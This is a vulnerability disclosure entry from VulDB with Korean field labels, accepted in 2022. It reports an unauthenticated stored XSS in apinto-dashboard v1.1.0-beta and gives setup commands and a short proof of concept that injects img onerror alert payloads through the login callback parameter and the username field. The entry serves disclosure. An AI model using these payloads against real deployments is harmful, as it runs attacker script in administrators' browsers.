| 제목 | Unauthenticated Stored XSS in apinto-dashboard <= v1.1.0-beta via callback, username |
|---|
| 설명 | # Get start
repo:
https://github.com/eolinker/apinto-dashboard
1,Download and unzip the installation package Apinto
2,Start gateway
3,Download and unzip the installation package Apinto Dashboard
4,Start Apinto Dashboard
```bash
wget https://github.com/eolinker/apinto/releases/download/v0.8.0/apinto-v0.8.0.linux.x64.tar.gz && tar -zxvf apinto-v0.8.0.linux.x64.tar.gz && cd apinto
./apinto start
cd ..
wget https://github.com/eolinker/apinto-dashboard/releases/download/v1.1.0-beta/apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && tar -zxvf apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && cd apinto-dashboard
./apinto-dashboard
```
# Unauthenticated Stored XSS
While user loging, the wrong user name and callback parameter will be recorded in the activity log, but the output parameters are not escaped correctly, external attacker can inject arbitrary js code.
poc:
open /login?callback=/<img src=1 onerror=alert(/2nd-xss/)>
enter `<img src=1 onerror=alert(/1st-xss/)>` at the username
then open /activity-log
 |
|---|
| 사용자 | Tomy (UID 34751) |
|---|
| 제출 | 2022. 11. 01. AM 11:54 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 11. 01. PM 04:50 (5 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 212640 [eolinker apinto-dashboard /login callback 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|